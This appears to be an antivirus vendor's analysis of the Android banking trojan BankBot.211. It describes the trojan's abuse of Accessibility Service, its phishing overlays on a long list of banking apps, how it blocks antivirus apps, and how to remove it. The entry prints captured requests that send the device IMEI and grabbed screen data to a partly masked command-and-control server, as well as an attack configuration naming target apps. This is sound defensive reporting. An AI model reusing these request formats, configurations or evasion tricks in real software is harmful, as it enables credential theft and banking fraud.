Android.BankBot.211.origin

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

A malicious program for Android mobile devices. Banking Trojan for Android that steals confidential information and executes cybercriminals’ commands. Android.BankBot.211.origin is distributed under the guise of benign programs.

Once installed and launched, in an infinite loop, Android.BankBot.211.origin tries to gain access to the Accessibility Service mode by blocking device operation with a window with the corresponding request.

After the user is forced to grant the Trojan the necessary rights, Android.BankBot.211.origin adds itself to the mobile device administrator list and assigns itself as the default SMS manager and gains access to the screen capturing functions (class MediaProjection is used for this purpose). Each indicated action requires user’s consent, however, after obtaining access to the Accessibility Service, the malicious program does it automatically by independently clicking confirmation buttons.

If the device’s owner attempts to remove the Trojan from the administrator list, Android.BankBot.211.origin will automatically click “Cancel”. In other cases, it clicks “Back” using the performGlobalAction method.

After the successful device infection, the Trojan reports this information to the command and control server by sending the request that looks the following way:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

The Trojan can execute the following commands:

• number_1/prefix_1—send an SMS with the text from the parameter prefix_1 to the number from the parameter number_1;
• call_log—forward to the server information about the installed applications, contact list and phone call data;
• sms_history—send to the server SMS stored in the device memory;
• url—open the specified link;
• server—change the address of the command and control server;
• intercept—add to the table reservas the parameters phones and obtained values of phone numbers;
• server_poll—add to the table reservas the parameters interval and obtained values.

Besides that, Android.BankBot.211.origin intercepts and sends to the server information about all incoming messages.

The Trojan periodically connects to its command and control server using the address http://217.***.***.92/jack.zip. The archive located through the link contains an ordinary text file. Android.BankBot.211.origin can send a POST request that looks the following way:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [device model] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554

As a response, the malicious program receives a configuration file encrypted with the AES algorithm. This file contains the parameters of the attack on the applications installed on the device. There are also names of targeted programs, link to parameters of phishing forms and the type of the executed action. Example:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

where:

• lock—attack on anti-virus programs and other software that can interfere with the Trojan’s operation (when such applications are launched, Android.BankBot.211.origin automatically clicks “Back”);
• window—display of a phishing settings window of a payment service that requests bank card information;
• fullscreen—display of a phishing window for input of login credentials during the launch of applications for operation with mobile banking and payment systems.

The Trojan displays phishing input forms during the launch of the following applications:

• com.akbank.android.apps.akbank_direkt – Akbank Direkt;
• com.akbank.softotp – Akbank Direkt Şifreci;
• com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
• com.garanti.cepsubesi – Garanti Mobile Banking;
• com.garanti.cepbank – Garanti CepBank;
• biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
• com.pozitron.iscep – İşCep;
• com.ykb.android – Yapı Kredi Mobile;
• com.ziraat.ziraatmobil – Ziraat Mobil;
• com.dbs.sg.dbsmbanking – DBS digibank SG;
• com.dbs.sg.posbmbanking – POSB digibank SG;
• com.dbs.dbspaylah – DBS PayLah!;
• com.dbshk – DBS mBanking Hong Kong;
• com.dbs.businessclass – DBS BusinessClass;
• com.dbs.quickcredit.sg – DBS Quick Credit;
• de.comdirect.android – comdirect mobile App;
• de.commerzbanking.mobil – Commerzbank Banking App;
• de.consorsbank – Consorsbank;
• com.db.mm.deutschebank – Meine Bank;
• de.dkb.portalapp – DKB-Banking;
• com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
• de.postbank.finanzassistent – Postbank Finanzassistent;
• mobile.santander.de – Santander MobileBanking;
• com.starfinanz.smob.android – Sparkasse;
• de.fiducia.smartphone.android.banking.vr – VR-Banking;
• pl.mbank – mBank PL;
• eu.eleader.mobilebanking.pekao – Bank Pekao;
• pl.pkobp.iko – IKO;
• com.comarch.mobile – Alior Mobile;
• com.getingroup.mobilebanking – Getin Mobile;
• pl.ing.ingmobile – INGMobile;
• pl.ing.mojeing – Moje ING mobile;
• org.banksa.bank – BankSA Mobile Banking;
• com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
• com.commbank.netbank – CommBank;
• com.cba.android.netbank – CommBank app for tablet;
• au.com.ingdirect.android – ING DIRECT Australia Banking;
• au.com.nab.mobile – NAB;
• org.stgeorge.bank – St.George Mobile Banking;
• org.banking.tablet.stgeorge – St.George Tablet Banking;
• org.westpac.bank – Westpac Mobile Banking;
• fr.creditagricole.androidapp – Ma Banque;
• fr.axa.monaxa – Mon AXA;
• fr.banquepopulaire.cyberplus – Banque Populaire;
• net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
• com.boursorama.android.clients – Boursorama Banque;
• com.caisseepargne.android.mobilebanking – Banque;
• fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
• mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
• uk.co.bankofscotland.businessbank – Bank of Scotland Business;
• com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
• com.barclays – Barclays Mobile Banking;
• com.grppl.android.shell.halifax – Halifax Mobile Banking app;
• com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
• com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
• com.lloydsbank.businessmobile – Lloyds Bank Business;
• santander – Santander;
• com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
• com.fi6122.godough – TSB Mobile;
• com.rbs.mobile.android.ubr – Ulster Bank ROI;
• com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
• com.rbs.mobile.android.natwest – NatWest;
• com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
• com.speedway.mobile – Speedway Fuel & Speedy Rewards;
• com.paypal.android.p2pmobile – PayPal;
• com.ebay.mobile – eBay;
• com.google.android.music – Google Play Music;
• com.android.vending – Google Play.

Android.BankBot.211.origin interferes with the operation of the following programs:

• com.drweb – Dr.Web Security Space;
• com.kms.free – Kaspersky Mobile Antivirus;
• screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
• com.huawei.android.mirrorshare –无线分享;
• com.antivirus – AVG AntiVirus;
• com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Examples of the fraudulent input forms and phishing windows Android.BankBot.211.origin can display:

The Trojan collects information about all launched applications and user’s actions performed within them. To do that, it tracks the following AccessibilityEvent events:

• TYPE_VIEW_TEXT_CHANGED;
• TYPE_VIEW_FOCUSED;
• TYPE_VIEW_LONG_CLICKED;
• TYPE_NOTIFICATION_STATE_CHANGED;
• TYPE_VIEW_SELECTED;
• TYPE_WINDOW_STATE_CHANGED;
• TYPE_VIEW_CLICKED.

It allows the malicious program to track available text fields in programs, such as menu elements, it can also log key strokes and other components of the user interface. The obtained data is sent to the command and control server. Example of the sent information:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}

Besides that, Android.BankBot.211.origin tracks the operation of keyboard and steals the input user’s data. On each key stroke, the Trojan makes a screenshot and sends the obtained images to the command and control server. It allows malicious program to steal passwords as well, and it is quick enough to save them before they are hidden. Data which is input via visible fields is duplicated in the sent POST request.

The Trojan prevents its removal and doesn’t allow to disable the access to its obtained extended functions. To get rid of Android.BankBot.211.origin, it is necessary to perform the following actions:

• Load an infected device in safe mode;
• Log into system settings and go to the list of administrators;
• Find the Trojan in this list and recall the corresponding rights (here Android.BankBot.211.origin will display a warning about the inevitable loss of all important data, but it is only a decoy);
• Restart the device, perform its full scan with an anti-virus and remove the Trojan after the scanning is complete.

News about the Trojan